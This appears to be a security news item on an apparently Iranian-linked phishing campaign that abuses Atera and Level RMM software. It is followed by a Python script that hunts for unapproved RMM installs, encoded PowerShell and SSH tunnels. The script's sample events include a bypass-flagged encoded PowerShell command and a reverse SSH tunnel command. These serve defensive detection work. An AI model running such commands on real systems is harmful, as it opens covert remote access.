Sophos's Managed Detection and Response (MDR) team has uncovered a new cyber campaign that uses targeted phishing to deploy legitimate remote management software for malicious purposes. The security firm believes this operation is connected to an Iranian threat group known as MuddyWater (TA450).
The attack campaign was first detected in November when Sophos security systems blocked suspicious credential-stealing activity targeting an organization in Israel. A similar incident was later observed affecting a U.S.-based customer.
The attackers' strategy involves sending phishing emails that direct victims to download what appears to be a shared document from onehub.com. The downloaded file, labeled "New Program ICC LTD.zip," contains an installer for Atera, a legitimate remote monitoring and management (RMM) tool.
The threat actors used a trial account of Atera, likely created with a compromised email address, to execute malicious PowerShell scripts designed to extract user credentials and create backup copies of system registry files.
Post-installation activities included:
- Multiple attempts to gather domain information
- Creation of SSH tunnels
- Installation of additional remote management tools
The attackers also attempted to deploy Level RMM, another remote management solution, through obfuscated PowerShell commands.
Sophos security systems detected and blocked these malicious activities through the company's behavioral monitoring rules. Sophos continues to track this threat cluster and monitor for similar attack patterns.
This incident highlights the growing trend of cybercriminals leveraging legitimate software tools for unauthorized system access and data theft. Organizations are advised to maintain strong email security practices and monitor for unauthorized installation of remote management software.
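The post-installation behaviours described above (an RMM agent landing outside the sanctioned tool set, the agent running PowerShell, obfuscated or encoded PowerShell, and SSH tunnel creation) map directly onto process-creation telemetry. The script below is an added illustration and is not Sophos's detection logic or any vendor's code: it runs a few hunting rules over constructed sample events. The event field names, the executable names such as `AteraAgentSetup.exe` and `level-agent.exe`, and the user and host values are assumptions made for the example; a production rule would key on code signers or vendor-published hashes rather than substrings of file names.

```python
"""Hunt for unsanctioned RMM use in process-creation telemetry.

Added example, not code from the article or from Sophos. Event fields mimic
common EDR/Sysmon process-creation records (an assumption about the schema).
"""
import base64
import re
import shlex
from dataclasses import dataclass

# Vendor tokens matched against executable names. Assumption: names alone are
# a weak signal; real deployments should check signer/hash instead.
RMM_TOKENS = {"atera": "Atera", "level": "Level RMM"}
PS_NAMES = {"powershell.exe", "pwsh.exe"}
SSH_NAMES = {"ssh.exe", "plink.exe"}
ENC_FLAG = re.compile(r"^-(?:e|ec|enc|encodedcommand)$", re.I)
# ssh/plink port-forwarding switches (-L, -R, -D), possibly combined as -fNR.
TUNNEL_FLAG = re.compile(r"(?:^|\s)-[A-Za-z]*[LRD]\b")


@dataclass
class Event:
    user: str
    parent_image: str
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rmm_vendor(path: str):
    """Return the RMM vendor an executable name points at, or None."""
    name = basename(path)
    for token, vendor in RMM_TOKENS.items():
        if token in name:
            return vendor
    return None


def decode_encoded_command(cmdline: str):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    try:
        args = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:
        args = cmdline.split()
    for flag, value in zip(args, args[1:]):
        if ENC_FLAG.match(flag):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return "<undecodable payload>"
    return None


def analyze(events, approved_rmm):
    """Return (rule, user, detail) alerts; approved_rmm is the org's allowlist."""
    alerts = []
    for ev in events:
        vendor = rmm_vendor(ev.image)
        if vendor and vendor not in approved_rmm:
            alerts.append(("unapproved_rmm", ev.user, f"{vendor}: {ev.image}"))
        child = basename(ev.image)
        if child in PS_NAMES:
            # An RMM agent running PowerShell is how the article's attackers
            # executed their scripts; flag it even for a sanctioned tool.
            parent_vendor = rmm_vendor(ev.parent_image)
            if parent_vendor:
                alerts.append(("rmm_spawned_powershell", ev.user, f"{parent_vendor} -> {child}"))
            decoded = decode_encoded_command(ev.cmdline)
            if decoded is not None:
                alerts.append(("encoded_powershell", ev.user, decoded))
        if child in SSH_NAMES and TUNNEL_FLAG.search(ev.cmdline):
            alerts.append(("ssh_tunnel", ev.user, ev.cmdline))
    return alerts


# Constructed sample events (not real telemetry). The encoded payload is built
# here so the fixture is self-describing; it decodes to a harmless string.
ENCODED = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    Event("alice", r"C:\Windows\explorer.exe",
          r"C:\Users\alice\Downloads\New Program ICC LTD\AteraAgentSetup.exe",
          r'"C:\Users\alice\Downloads\New Program ICC LTD\AteraAgentSetup.exe"'),
    Event("SYSTEM", r"C:\Program Files\Atera\AteraAgent.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          f"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {ENCODED}"),
    Event("alice", r"C:\Windows\System32\cmd.exe",
          r"C:\Windows\System32\OpenSSH\ssh.exe",
          "ssh.exe -N -R 2222:127.0.0.1:22 user@203.0.113.10"),
    Event("SYSTEM", r"C:\Windows\System32\msiexec.exe",
          r"C:\Users\alice\AppData\Local\Temp\level-agent.exe", "level-agent.exe /quiet"),
    Event("alice", r"C:\Windows\explorer.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoProfile Get-Date"),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS, approved_rmm=set()):
        print(alert)
```

Run with an empty allowlist, the sample set yields five alerts: both RMM installs, the PowerShell spawned by the agent, its decoded encoded command, and the reverse SSH tunnel; the benign interactive PowerShell produces nothing. Adding `"Atera"` to the allowlist silences the install alert but keeps the agent-spawned-PowerShell alert, which is the behaviour the article describes being abused on an otherwise legitimate tool.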